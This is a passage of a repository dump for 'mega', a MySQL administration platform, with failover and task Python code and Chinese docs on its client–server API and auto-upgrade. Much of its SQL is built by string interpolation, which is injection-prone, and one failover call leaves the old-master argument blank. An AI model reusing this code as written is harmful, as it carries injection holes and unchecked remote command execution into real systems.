name='%s',master=%s,manager=%s,rvip=%s,wvip=%s,type=%s where id=%s\" %(self.name,self.master,self.manager,self.rvip,self.wvip,self.type,self.id)\n result,ex=self.q.execute(sql)\n if not result:\n return False,ex\n return True,''\n def change_master(self,failoverid,new_master,method):\n ''' \n usage: python mha_switch.py --group=xx --old_master=ip:port --new_master=ip:port --type=xx --record=xx\n '''\n cmd='mha_switch.py'\n cmd_type='python'\n sql='select s.name,s.ip,master from failover f ,server s where f.manager=s.id and f.id=%s' %failoverid \n (group,ip,old_master)=self.q.fetchRow(sql)\n #data=self.q.fetchRow(sql)\n _old=InstanceGet().get_instance_by_id(old_master)\n _new=InstanceGet().get_instance_by_id(new_master)\n _old_m=\"%s:%s\" %(_old.get('ip'),_old.get('port'))\n _new_m=\"%s:%s\" %(_new.get('ip'),_new.get('port'))\n record_id=self.add_failover_record(failoverid, method,_old_m,_new_m)\n self.add_failover_record_detail(record_id, 
'mega',now(),0, 'Y', 'Start the switch task.')\n args=\"--group=%s --old_master= --new_master=%s:%s --type=%s --record=%s\" %(group,_old_m,_new_m,method,record_id)\n #group name ,old master ,new master,action\n result=remote_cmd(ip,None,cmd,cmd_type,args)\n if result == 0:\n self.stat_failover_record(record_id, 'Failed')\n self.add_failover_record_detail(record_id, 'mega',now(),0, 'Y', 'End the task as failed to call remote script')\n return False\n else:\n self.add_failover_record_detail(record_id, 'mega',now(),0, 'Y', 'Call the remote script on %s' % ip)\n return True\n \n def add_failover_record(self,failover_id,method,old_master,new_master,failover_name=None):\n '''\n 1.add a failover record with a given failover id --used for mega web site\n 2.add record with a failover group name --used for command line ha switch\n \n return :\n None: failed to get the new record\n id(int): the new record for failover switch\n '''\n if not failover_id:\n if not failover_name:\n return None\n else:\n sql=\"select id from failover where name='%s'\" % failover_name \n failover_id=self.q.fetchOne(sql)\n sql=\"insert into failover_record (failover_id,method,re_time,old_master,new_master,result) values(%s,'%s',now(),'%s','%s','Running')\"\\\n %(failover_id,method,old_master,new_master)\n result,ex=self.q.execute(sql)\n if result:\n record_id=self.q.fetchOne(\"select last_insert_id()\")\n else:\n log.error(ex)\n record_id=None\n return record_id\n \n def stat_failover_record(self,record_id,stat='Y'):\n '''\n 1.stat the result for a switch task\n return :\n True | False\n\n '''\n if not record_id:\n return None\n sql=\"update failover_record set result='%s' where id=%s\" % (stat,record_id)\n result,ex= self.q.execute(sql)\n if not result :\n log.error(ex)\n return False\n else:\n return True\n \n def add_failover_record_detail(self,record_id,module,re_time,time_used,result,content):\n '''\n record_id ,get from the function add_failover_record()\n 1.if task invoked by mega, the id will be given\n 2.if task begins from the command line, call the add_failover_record() and get the new record id \n befor add new detail logs\n return :\n True | False\n '''\n if not record_id:\n return False \n sql=\"insert into failover_record_detail(record_id,module,re_time,time_used,result,content) \\\n values(%s,'%s','%s',%s,'%s','%s');\" %(record_id,module,re_time,time_used,result,content)\n result,ex=self.q.execute(sql)\n if not result :\n log.error(ex)\n return False\n else:\n return True\n \nclass FailoverGet():\n '''\n '''\n def __init__(self):\n self.q=PyMySQL()\n \n def get_failover_list(self,ip=None):\n \n sql='''select f.id as id,f.name as name,f.type as type,i.id as instance_id,concat(i.ip ,':',i.port) as master,s.id as server_id,s.ip as manager,v.id as rvip_id,v.vip as rvip,\n v2.id as wvip_id,v2.vip as wvip, f.last_time from failover f left join instance i on f.master=i.id left join server s on f.manager=s.id left join vip v on f.rvip=v.id left join vip v2 on f.wvip=v2.id where 1=1 '''\n if ip :\n sql+=\"and v.vip='%s' or v2.vip='%s'\" % (ip,ip)\n failover_list=self.q.query(sql, type='dict')\n return failover_list\n \n def get_failover_by_id(self,id):\n if not id:\n return None \n sql=\"select a.name,concat(b.ip,':',b.port) as old_master,c.vip as rvip,d.vip as wvip from failover a left join instance b on \\\n a.master=b.id left join vip c on a.rvip=c.id left join vip d on a.wvip=d.id where a.id=%s;\" % id\n return self.q.query(sql, type='dict').fetchone()\n def get_failover_by_master(self,master_id):\n sql=\"select 
a.*,b.ip as manager_ip,c.vip as rvip_ip,d.vip as wvip_ip from failover a left join server b on a.manager=b.id \\\n left join vip c on a.rvip=c.id left join vip d on a.wvip=d.id where master=%s;\" % master_id\n return self.q.query(sql, type='dict').fetchone()\n\n def get_failover_history(self,id): \n if not id:\n return None \n sql=\"select * from failover_record where failover_id=%s order by id desc\" %id\n return self.q.query(sql, type='dict').fetchall()\n \n def get_failover_history_detail(self,record_id,failover_id=None):\n if not record_id:\n if not failover_id:\n return None\n else: \n record_id=self.get_newest_record(failover_id)\n sql=\"select * from failover_record_detail where record_id=%s order by id desc \" %record_id\n return self.q.query(sql, type='dict').fetchall()\n\n def get_newest_record(self,failover_id):\n sql=\"select max(id) from failover_record where failover_id=%s\" %failover_id\n return self.q.fetchOne(sql)\n\n def get_failover_result(self,record_id): \n if not record_id:\n return {}\n sql=\"select result from failover_record where id=%s\" %record_id\n return self.q.query(sql, type='dict').fetchone()\n \n def get_instance_failover(self,instance_id):\n instance=InstanceGet().get_instance_by_id(instance_id)\n if not instance:\n return []\n if instance.get('role') == 1:\n master=instance\n slaves=InstanceGet().get_instance_slaves(instance_id)\n else:\n master=InstanceGet().get_instance_slaves(instance.get('master_id'))\n if master:\n master=master[0]\n slaves=InstanceGet().get_instance_slaves(master.get('id'))\n else:\n slaves=[]\n failover=self.get_failover_by_master(master.get('id'))\n group=[master]+list(slaves)\n return {'failover':failover,'group':group}\n \ndef main():\n return\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.47226443886756897, "alphanum_fraction": 0.615121603012085, "avg_line_length": 13, "blob_id": "5b261e3d542db7dd691fa7e1d8b8399043b78f50", "content_id": "6735ada139ce15e278ef4c7562e903735d5fa465", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4644, "license_type": "no_license", "max_line_length": 52, "num_lines": 188, "path": "/docs/tasklist.md", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#Task List\n\n* 全局架构设计\n* 规范设计\n* 模块切分,功能设计\n\n#Sub List\n* 项目初始化 2014-05-08\n\t* 部署规范\n\t\t* 初始化 2014-06-20\n\t\t* 分离开发和线上环境\n\t\t* 增加uwsgi服务作为web服务\n\t* deamon 服务 \n\t\t* start stop restart 2014-06-23\n\t\t* 线程管理\n* 规范流程\n\t* 代码规范文档\n\t* 注释规范\n\t* 接口规范\n\t* 测试用例规范\n\t* 公用类调用规范\n\t\t* 日志类\n\t\t* 公用函数\n\t\t* model\n\t\t* 页面模板(html)\n* 主体流程实现\n\t* url 规划及跳转 2014-05-26\n* 资源池管理 2014-05-12\n\t* 基本信息维护,实例,数据库,服务器,数据库 2014-05-13\n\t* 页面设计\t2014-05-14\n\t* 相关接口开发\t2014-05-19\n\t\t* 资源池接口开发及测试用例 2014-05-21 完成开发和部分测试用例\n\t\t* 资源池接口测试及测试用例 \n\t* 录入数据有效性验证 2014-05-15 \n\t* 元数据管理关系建立 2014-05-16\n\t* 编辑功能异常捕获 \n\t* 用户管理 2014-06-26\n\t* 页面功能调整 2014-07-02\n\t\t* 所有页面搜索功能实现 2014-07-03\n\t\t* 分页实现\n\t\t* 联想输入\n\t* 增加快捷导航栏\n\t* 增加实例版本号 2014-07-16\n\t* 增加全局元数据管理模块\n\t\t* 维护页面\n\t\t* 数据表设计\n\n\t* 增加服务器域名管理 2014-07-25\n\t* 增加实例高可用组维护\n\n* 服务层整体框架规划\n\t* 主体流程设计,2014-05-27\n\t\t* 任务相关表建立\n\t\t* 数据流规划\n\t* 主体逻辑实现 2014-05-29\n\t\t* tcp 监听 2014-05-28\n\t\t* 消息队列维护设计 \n\t\t* 任务捕获及解析\n\t\t* 任务执行\n\t* 任务调度模块\n\t\n\t* TCP 服务端设计\n\t\t* TCP 通信数据包协议 2014-5-30 \n\t\t* sender client 功能 2014-06-05 完成通信接口,确定client 代码\n\t\t* listener 功能 2014-06-05 功能完善,通信协议修改\n\t* TCP 发送端及发送接口\n\t* 测试模块\n\t* 服务层api\n* 日志模块\n\t* 统一日志入口 2014-06-03\n\t* 日志接口调用规范\n\t* 服务层日志调整\n\t\n* 备份调度 gxg,xchliu\n\t* 备份整体调度流程确认 
2014-06-06\n\t* 后台tracker流程设计 2014-06-17\n\t* 备份相关数据表设计 \n\t* 备份规则确认\t2014-06-17\n\t* 测试用例\t2014-06-18\n\t\t* salt 联调 2014-06-20\n\t* 页面设计 2014-06-09 10 \n\t\t* 备份状态信息 2014-06-12\n\t\t* 备份配置管理 2014-06-13\n\t\t* 增加度配置浏览页面 \n\t* 备份资料库更新接口 2014-06-18\n\n\t* 解除salt 依赖 2014-07-28\n\t\t* sender 增加监听\n\t\t* 备份任务调度策略更新\n\t\t* 联调\n\t* 备份恢复\n\t\t* 日常恢复测试\n\t\t* 定点恢复\n\t\n* 慢查询分析统计\n\t* 需求收集,功能规划 2014-07-14\n\t* 元数据定义\t\t2014-07-15\n\t* 接口\t\t2014-07-15\n\t\t* 接口开发\n\t\t\t* tracker 周期任务调度 2014-07-16\n\t\t* 接口调试\t\t\n\t* 慢查询收集脚本\t\n\t* sql 解析实现 2014-07-21\n\t\n\t* 模块文档\n\t* 统计分析\n\t\t* 确定统计项\n\t\t* 后台统计任务调度\n\t\t\t* 统计表设计\n\t\t\t* 统计项维度\n\t* 页面开发\n\t\t* 统计报表\n\t* 基于实例维度的统计\n\t\t* 实例慢查询趋势\n\t\t* 实例top sql\n\t\t* 实例中db占比\n\t* 基于sql维度统计\n\t\t* sql的来源\n\t\t* sql基于时间的次数变化\n\t\t* sql优化前后的对比\n\t* top sql根据优化状态排序\n\t* top 增加时间维度查询\n\t\n\t\n* 任务调度\n\t* 任务调度管理(list,增加,修改) 2014-08-04\n\t\t* 页面开发\n\t\t* 后台api开发\n\t\t\n\t* 远程任务调度实现\t\n\t\t* 定制任务执行流程\n\t\t* 远程调用接口\n\t\t* 任务执行状态更新\n\t\t* 本地调试\n\t\t\n* mega 工具包\n\t* 集成方法调研\n\t* 集成sender\n\t* 集成conn,sendmail \t\t\n\n* mega-client \n\t* sender \n\t* 增加监听功能 2014-7-29\n\t* client自动升级功能 2014-07-30\n\t* 增加部署功能 2014-07-31\n\t* 增加文件传输\n\t* 增加系统命令调用\n\t* 客户端管理\n\t\t* 状态监测\n\t\t* 管理页面\n\t* client 服务daemon 重构 2014-08-14\n\t* client 部署\n\n* 传送门\n\t* 增加文档上传下载 2014-02-29\n\n* 用户管理\n\t* 用户维护\n\t* 权限维护\n* 高可用管理\n\t* mha 集成 2014-10-14 \n\t\t* vip 管理\n\t\t* 高可用组信息的维护\n\t\t* 切换调度模块\n\t\t* 切换过程信息\n\t\t* 主从关系更新接口\t \n\t\n\t* oracle 高可用\n\t* 切换测试\n\t\n* 系统统计分析\n\t*增加各页面点击统计,增加快捷功能\n\t*增加任务调度统计,\n\n* 基本信息收集 2014-10-22\n\t* 确认信息收集流程\n\t* 信息收集接口开发\n\t* 资源池页面增加任务控制\n\t* 基本信息统计及报表\n\t\n###维护性功能\n* BUG 修复\n\t* 备份重复发起问题 2014-07-07 (时间临界点问题)\n\n\n###待完成功能\n* 需求,bug修复提交页面\n* 增加帮助页面,一般问题汇总,增加wiki链接\t" }, { "alpha_fraction": 0.570806086063385, "alphanum_fraction": 0.5991285443305969, "avg_line_length": 19.81818199157715, "blob_id": "787ee196aa8214d7a0fa8049398187cea061c15d", "content_id": "7a247930a290899ab6d48c5d70538d07b2c3476c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 459, "license_type": "no_license", "max_line_length": 44, "num_lines": 22, "path": "/src/mega_client/mega-1.0/mega_client/utils.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 30, 2014\n\n@author: xchliu\n\n@module:mega_client.mega_client.utils\n'''\nimport socket as S\nfrom socket import socket,SOCK_DGRAM,AF_INET\n\ndef get_ip_address():\n myname=''\n myip=''\n try:\n myname = S.getfqdn(S.gethostname())\n myip = S.gethostbyname(myname)\n except:\n s = socket(AF_INET, SOCK_DGRAM)\n s.connect(('8.8.8.8', 0))\n myip=s.getsockname()[0] \n return myname,myip\n\n" }, { "alpha_fraction": 0.5735930800437927, "alphanum_fraction": 0.5930736064910889, "avg_line_length": 20.045454025268555, "blob_id": "78d483d07831d5b27ad006e73a158caaf7ee2dae", "content_id": "4fc0cee56a92488782dcd7551008eb5f689c3c79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 462, "license_type": "no_license", "max_line_length": 66, "num_lines": 22, "path": "/src/mega_service/slowlog/slow_log.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 16, 2014\n\n@author: xchliu\n\n@module:mega_service.slow_log\n'''\nfrom lib.PyMysql import PyMySQL\n\nclass SlowLog():\n\n def __init__(self):\n pass\n \n def get_slowlog_instance_list(self):\n sql=\"select * from instance where stat=1 and slowlog=1\"\n 
instance_list=PyMySQL().query(sql, type='dict').fetchall()\n if instance_list:\n return instance_list\n else:\n return []" }, { "alpha_fraction": 0.5193798542022705, "alphanum_fraction": 0.5736433863639832, "avg_line_length": 13.333333015441895, "blob_id": "42232cb0ca241ccf85f73a0b393bffa462c269db", "content_id": "ee13770809b06cb618cf1409076ce9f7e8a7f7e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "no_license", "max_line_length": 28, "num_lines": 9, "path": "/src/mega_client/mega_client/__init__.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 21, 2014\n\n@author: xchliu\n\n@module:mega_client.__init__\n'''\n__all__=['sender','utils']\n" }, { "alpha_fraction": 0.6399284601211548, "alphanum_fraction": 0.6634088158607483, "avg_line_length": 29.736263275146484, "blob_id": "da01586f4a7d9172e13d71112a3c5416c2ca3730", "content_id": "6db81306cb94c89cf2df08c119c8841d721312a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 11212, "license_type": "no_license", "max_line_length": 138, "num_lines": 273, "path": "/docs/wydba.md", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#wy python 公用库\n\n##功能点\n\n### 数据库连接\n\t* conn mysql 连接\n### 邮件发送\n\t* sendmail \n\t\n### mega client\n\t\n* logs\tmega 客户端日志,调用后日志可打入client日志:/var/log/mega/mega_client.log\n* sender mega 交互类,可调用服务端提供的api接口\n* utils 工具类,包含各种通用性工具\n\n\n##开发规范\n\t* 统一开发规范\n\t* 接口调用规范\n###接口函数\n获取mega service 支持的接口函数列表,使用下面的代码:\n\t\n\t>>> from mega_client import sender\n\t>>> c=sender.MegaTool()\n\t>>> c.get_all_funcs()\n\n安全考虑,上面的代码只能在mega service 所在服务器可获取有效列表,其他节点返回列表为空。\n\n>输出内容格式:\n\n>* 接口函数名称,用于后续调用指定\n\n>* 参数定义:\n\n>\t* args 为定义参数\n\n>\t* varargs 不定无名参数,即存在定义参数*args\n\n>\t* keywords\t不定有名参数,即存在定义参数**kwargs\n> * defaults 默认值,tuple形式,对应args中每一个参数的默认值,None为无默认值\n\n目前支持的接口参数:\n\nupdate:2014-10-10\n\n1. add_database ArgSpec(args=['ip', 'port', 'db'], varargs=None, keywords='args', defaults=None)\n2. add_instance ArgSpec(args=['ip', 'port'], varargs=None, keywords='args', defaults=None)\n3. add_server ArgSpec(args=['ip'], varargs=None, keywords='args', defaults=None)\n4. add_slow_log ArgSpec(args=['log_info'], varargs=None, keywords=None, defaults=None)\n5. backup_routine ArgSpec(args=['time'], varargs=None, keywords='args', defaults=(None,))\n6. client_ping ArgSpec(args=['ip', 'version'], varargs=None, keywords='args', defaults=(None,))\n7. client_upgrade ArgSpec(args=['host_list'], varargs=None, keywords=None, defaults=(None,))\n8. del_database ArgSpec(args=['ip', 'port', 'db'], varargs=None, keywords=None, defaults=None)\n9. del_instance ArgSpec(args=['ip', 'port'], varargs=None, keywords=None, defaults=None)\n10. del_server ArgSpec(args=['ip'], varargs=None, keywords=None, defaults=None)\n11. failover ArgSpec(args=['group_name', 'old_master', 'new_master', 'method', 'time'], varargs=None, keywords=None, defaults=None)\n12. get_all_backup ArgSpec(args=[], varargs=None, keywords=None, defaults=None)\n13. get_all_db ArgSpec(args=['model', 'stat', 'count'], varargs=None, keywords=None, defaults=(None, 0, 0))\n14. get_all_instance ArgSpec(args=['model', 'stat', 'count', 'role'], varargs=None, keywords=None, defaults=(None, 0, 0, None))\n15. get_all_server ArgSpec(args=['model', 'stat', 'count'], varargs=None, keywords=None, defaults=(None, 0, 0))\n16. 
get_database ArgSpec(args=['model', 'ip', 'port', 'db'], varargs=None, keywords=None, defaults=(None, None, 3306, None))\n17. get_instance ArgSpec(args=['model', 'ip', 'port'], varargs=None, keywords=None, defaults=(None, None, 3306))\n18. get_server ArgSpec(args=['model', 'ip'], varargs=None, keywords=None, defaults=(None, None))\n19. main ArgSpec(args=[], varargs=None, keywords=None, defaults=None)\n20. mod_database ArgSpec(args=['ip', 'port', 'db'], varargs=None, keywords='args', defaults=None)\n21. mod_instance ArgSpec(args=['ip', 'port'], varargs=None, keywords='args', defaults=None)\n22. mod_server ArgSpec(args=['ip'], varargs=None, keywords='args', defaults=None)\n23. remote_cmd ArgSpec(args=['ip', 'port', 'cmd', 'cmd_type', 'task_id', 'args'], varargs=None, keywords=None, defaults=(None, None))\n24. report_routine ArgSpec(args=['time'], varargs=None, keywords=None, defaults=(None,))\n25. slowlog_pack ArgSpec(args=['sql'], varargs=None, keywords=None, defaults=None)\n26. slowlog_routine ArgSpec(args=['time'], varargs=None, keywords=None, defaults=(None,))\n27. slowlog_statics ArgSpec(args=['time'], varargs=None, keywords=None, defaults=(None,))\n28. slowlog_statics_per_hour ArgSpec(args=['v_time'], varargs=None, keywords=None, defaults=None)\n29. task_log ArgSpec(args=['task_id', 'start_time', 'end_time', 'stat', 'redo', 'comment'], varargs=None, keywords=None, defaults=(0, ''))\n30. update_backupinfo ArgSpec(args=['task_info', 'action'], varargs=None, keywords=None, defaults=('INSERT',))\n\n###模块调用:\n\nmega client 在安装或者升级时会将公用库放到该环境的python site package 中,使用时直接import 即可。 提供的公用库:\n\n* sender\n* logs\n* setting\n* utils\n\t* sendmail\n\t* get_ip_address\n\n####sender\nsender 为客户端与服务端核心交互模块,负责所有的数据发送。其中包含2个类:\n\n* MegaClient mega 客户端发送类,负责对数据包的检查,封装,与服务端的通信,数据包的拆包等操作\n* MegaTool\t 管理类,目前只包含一个函数,就是上面获取所有接口函数的函数\n\n#####MegaClient\n其中有2个常量:\n \n\tHOST = 'localhost'\n\tPORT = 1104\n默认情况下,sender会向本地1104端口发送请求数据,因此在其他节点获取所有接口函数列表或者其他操作都会连接失败,返回空列表。可以通过加上HOST参数来解决:\n\n\t>>> from mega_client import sender\n\t>>> from mega_client.setting import MEGA_HOST\n\t>>> cmd='get_all_instance'\n\t>>> c=sender.MegaClient(host=MEGA_HOST,cmd=cmd)\n\t>>> c.run(func_args=\"model='backup',stat=1,role=1\",CYCLE=1)\n\t>>> c.close()\n**MegaClient.run** 参数说明\n\n这里存在2层调用处理:\n\n1. 当前代码对MegaClient类的调用\n2. 在服务端对指定函数(cmd定义的函数名称)的调用\n\n所以`run`函数需要处理自己的参数,也要接收目标函数的参数。函数的定义:\n\n\tdef run(self,func_args=None,**args): \n* func_args 就是目标函数的调用参数,比如上面的func_args=\"model='backup',stat=1,role=1\",这些其实会传递给服务端的接口函数get_all_instance。\n* **args 为run函数自己的运行参数,将作为客户端节点发送到服务端数据包的属性,目前会被解析的参数:\n\n\t\t_item=['TYPE','TIME','VALUE','CYCLE','TARGET','ARGS']\n\t keys:\n * TYPE: 0 internal server task,1 remote task\n * VALUE: func name which be called\n * TIME: when to do : 0 once , relay to the CYCLE\n CYCLE: lifecycle of job day,week,month\n TARGET: unique identify for server or instance or database. \n unique command type when in the case used for remote command etc.\n *cmd\n *python\n *bash\n ARGS: args for the api func\n TOOL: Internal func calls\n一般情况下,使用正常调用即可,不需要指定上面的参数,列出来是为了避免指定同名参数造成异常。以及一些确实需要改变请求动作的特殊情况。\n\n**返回结果**\n\n如果有返回结果,run函数会直接返回,返回内容为UTF8 编码的字符串,但格式一般都已经处理为list,对结果做eval()处理后即\n可使用,不在sender完成对象转换有2个考虑:\n\n1. 多语言调用,后续可实现通过命令行进行接口调用\n2. 
避免数据丢失\n\n####logs\n提供一个简单的日志类,能满足一般的日志需求。如果涉及handler ,level,切分等自定义,还是建议调用logging库来实现。\n\n调用实例:\t\n\n\t>>> import mega_client.logs\n\t>>> log=logs.Logger('test').log()\n\t>>> log.info('test')\n其中Logger在初始化的时候如果参数logfile=None被赋值,返回的log对象会将日志打到指定文件中。\n\n默认情况下,level为DEBUG,输出路径为/var/log/mega/mega_client.log,日志格式为一般通用日志格式。\n####setting\n\n客户端的配置文件放到公用库的目的是提供部分全局信息:\n\n\tCLIENT_DIR = '/home/mysql/'\n DAEMON_LOG = '/var/log/mega/mega_client.log'\n DAEMON_PID = '/var/run/mega_client.pid'\n DEAFULT_LOG_DEBUG = True\n DEFAULT_TARGET = 'cmd'\n KEEPALIVE = 300\n LOG_FILE_NAME = '/var/log/mega/mega_client.log'\n MEGA_HOST = '172.17.62.37'\n SCRIPT_DIR = '/home/mysql/admin/mega_client/script/'\n SERVICE_PID = '/var/run/mega_client_srv.pid'\n TCP_HOST = ''\n TCP_PORT = 1105\n version = 'mega-client 0.1'\t\t\t\n\n后续将实现客户端去服务器读取配置,如keepalived 监测周期,版本信息,访问本地数据库的账号密码等。\n\n####utils\n\nget_ip_address()获取本地hostname及ip地址。\n\n\n##维护相关\n###客户端安装\n\n初始化客户流程:\n\n* 拷贝客户端安装包到目标服务器:/home/xdba/\n* root执行安装脚本:\n\n\t\tsudo bash install.sh \n客户端代码层级:\n\t\n\t\t.\n\t\t├── PKG-INFO\n\t\t├── build\n\t\t│   └── lib\n\t\t│   └── mega_client\n\t\t│   ├── __init__.py\n\t\t│   ├── client_main.py\n\t\t│   ├── listener.py\n\t\t│   ├── logs.py\n\t\t│   ├── mega_client.py\n\t\t│   ├── sender.py\n\t\t│   ├── setting.py\n\t\t│   ├── setup.py\n\t\t│   ├── utils.py\n\t\t│   └── worker.py\n\t\t├── install.sh\n\t\t├── mega_client\n\t\t│   ├── __init__.py\n\t\t│   ├── client_main.py\n\t\t│   ├── listener.py\n\t\t│   ├── logs.py\n\t\t│   ├── mega_client.py\n\t\t│   ├── sender.py\n\t\t│   ├── setting.py\n\t\t│   ├── setup.py\n\t\t│   ├── utils.py\n\t\t│   └── worker.py\n\t\t└── setup.py\n\n###客户端升级\n\n客户端实现自动化升级,完成代码迭代。\n\n升级脚本:/mega_client/script/upgrade.py\n\n* 升级发起方式\n\t* mega服务端任务推送\n\t* mega客户端发起请求\n\t\n* 升级流程\t\n\t* 服务端:在目录/mega/mega_client/中执行命令产生最新client 安装包:\n\t\n\t\t\tpython setup.py sdist\n\t\t\ttar zxvf dist/mega-1.0.tar.gz\n\n\t* 客户端:完成本地环境检查和升级准备工作:upgrade.py:Upgrade._get_pag()\n\t\t\n\t* 客户端:调用本地client 中sender 模块,向服务器发送升级请求:\n\t\t\t\n\t\t self.cmd='client_upgrade'\n \t\tself.c=MegaClient(host='172.17.62.37',cmd=self.cmd)\n\t\t\tpag=self.c.run(func_args=ip,TOOL=True)\n\t* 服务端:解析数据包后,调用api中接口:\n\n\t\t\t2014-07-31 14:13:07 API-tool DEBUG Receive upgrade request: ['192.168.199.245']\n\t\t\t2014-07-31 14:13:07 Worker DEBUG Call API: apis.client_upgrade(['192.168.199.245'])\n\t\t\n\t* 服务端:在目录/mega_client/dist/中获取代码包,遍历目录文件,返回包含所有代码数据的[]\n\t\t\t\t \n\t\t\t_pag.extend(read_file(_prefix,_prefix))\n \treturn _pag\n\t* 客户端:\n\t\t* 接收返回数据,还原代码包到临时目录:/tmp/\n\t\t* python package安装:\n\t\t\t\t\n\t\t\t\tpython /tmpdir/setup.py install\n\t\t* 代码包替换,将本地服务包运行包替换为新代码包,默认本地服务运行路径:/home/xdba/\n\n\t\t\t\tcp -ar tmpdir clientdir\n\t\t* 重启client 服务:\n\t\t\t\t\t\n\t\t\t\tpython /etc/init.d/mega_client restart\t\n* 操作流程\n\t* 确认服务端/mega_client/dist/ 目录有存在有效代码包:\n\t\t\n\t\t\t[xchliu@xchliu dist]$ ls\n\t\t\tmega-1.0 mega-1.0.tar.gz\n\t* 调度升级 \n\t\t* 服务器端配置调度任务,进行客户端升级\n\n\t\t\t<a href=\"http://172.17.61.63:8080/admin/client\">mega任务调度</a>\n\t\t* 客户端运行升级脚本,进行单点升级:\n\n\t\t\t\tpython upgrade.py" }, { "alpha_fraction": 0.6299483776092529, "alphanum_fraction": 0.6419965624809265, "avg_line_length": 25.31818199157715, "blob_id": "2225fb2147b4934f24408850d4b0277323694310", "content_id": "250ec5c0f15f768dd11a80e89a0face4dedf95eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1162, "license_type": "no_license", "max_line_length": 117, "num_lines": 44, "path": "/src/apis/task.py", "repo_name": 
"Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 29, 2014\n\n@author: xchliu\n\n@module:apis.task\n'''\n\nfrom lib.logs import Logger\nfrom lib.PyMysql import PyMySQL\ntry:\n from mega_client.sender import MegaClient\nexcept:\n from mega_client.mega_client.sender import MegaClient\n\n\nMODEL='API-task'\nlog=Logger(MODEL).log()\n\n\ndef remote_cmd(ip,port,cmd,cmd_type,task_id=None,args=None):\n '''\n ip port:instance info\n cmd :task name or the script name\n cmd_type: python,shell,cmd\n args: for script\n '''\n if task_id and args:\n args=str(task_id)+\" \"+ args\n c=MegaClient(host=ip,port=1105,cmd=cmd)\n result=c.run(func_args=args,TARGET=cmd_type)\n log.debug(\"result for %s@%s:%s\" %(cmd,ip,result))\n return result\n\ndef task_log(task_id,start_time,end_time,stat,redo=0,comment=''):\n value=(task_id,start_time,end_time,stat,redo,comment)\n sql=\"insert into task_log(task_id,start_time,end_time,stat,redo,comment) values(%s,'%s','%s',%s,%s,'%s')\" % value\n log.debug(sql)\n result,ex=PyMySQL().execute(sql)\n if not result:\n log.error(\"Save task log failed as :%s\" % ex)\n return (0,ex)\n return 1\n " }, { "alpha_fraction": 0.4890387952327728, "alphanum_fraction": 0.5649241209030151, "avg_line_length": 15.971428871154785, "blob_id": "f986763957f181c536d8e2ff4dfb272ebcf2b997", "content_id": "4a6cf9361c8f18c01337251c788f9cbca8e0aafa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 593, "license_type": "no_license", "max_line_length": 42, "num_lines": 35, "path": "/src/tests/slow_log.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "'''\nCreated on Jul 15, 2014\n\n@author: xchliu\n'''\nimport unittest\nimport sys\nsys.path.append(\"..\")\n\nfrom mega_service.sender import MegaClient\n\nvar='''\n {'db_host': '127.0.0.1',\n 'port': 3306,\n 'start_time':'0000-00-00 00:00:00',\n 'user':'xchliu',\n 'user_host':'127.0.0.1',\n 'query_time': 20,\n 'lock_time':12,\n 'rows_sent':21,\n 'rows_examined':22,\n 'sql_text':'select 1',\n 'sql_explained':\"{test:test}\"\n}\n'''\n\ndef test_add_slowlog():\n cmd='add_slow_log'\n c=MegaClient(cmd=cmd)\n print c.run(var) \n\n\n\nif __name__ == \"__main__\":\n test_add_slowlog()" }, { "alpha_fraction": 0.6898733973503113, "alphanum_fraction": 0.702531635761261, "avg_line_length": 30.66666603088379, "blob_id": "d0b6272a3971433353df15a71264d2d22df9c41a", "content_id": "3b74ed894c5cb318de41ec096dc391096902267c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 474, "license_type": "no_license", "max_line_length": 121, "num_lines": 15, "path": "/src/mega_client/mega-1.0/script/__init__.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "'''\nCreated on Jul 30, 2014\n\n@author: xchliu\n\n@module:mega_service.mega_client.upgrade\n'''\n\n__doc__=\"\"\"\n scripts used for client func invoking\n all the scripts here can/should use the public mega_client module instead of import the private path \n \n in fact,scripts will be called in the command line by the worker class,\n and the exit error code and standard output will be logged and used to verdict whether the task runs successfully\n\"\"\"" }, { "alpha_fraction": 0.5864432454109192, "alphanum_fraction": 0.5925361514091492, "avg_line_length": 29.534883499145508, "blob_id": "bc08dbb634c64b85e099fbd468994aa1575c605d", "content_id": "86862800a818ecfd2376f22421b5470c60a2eeb4", "detected_licenses": [], "is_generated": 
false, "is_vendor": false, "language": "Python", "length_bytes": 1313, "license_type": "no_license", "max_line_length": 145, "num_lines": 43, "path": "/src/mega_web/entity/models.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "'''\nCreated on May 9, 2014\n\n@author: xchliu\n'''\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"mega_web.settings\")\nfrom entity import *\nfrom report import * \nfrom lib.PyMysql import PyMySQL\n\ndef raw_as_qs(Table,raw_query, params=()):\n \"\"\"Execute a raw query and return a QuerySet. The first column in the\n result set must be the id field for the model.\n :type raw_query: str | unicode\n :type params: tuple[T] | dict[str | unicode, T]\n :rtype: django.db.models.query.QuerySet\n \"\"\"\n cursor = connection.cursor()\n try:\n cursor.execute(raw_query, params)\n return Table.objects.filter(id__in=(x[0] for x in cursor))\n finally:\n cursor.close()\n\nclass Alert():\n \n def 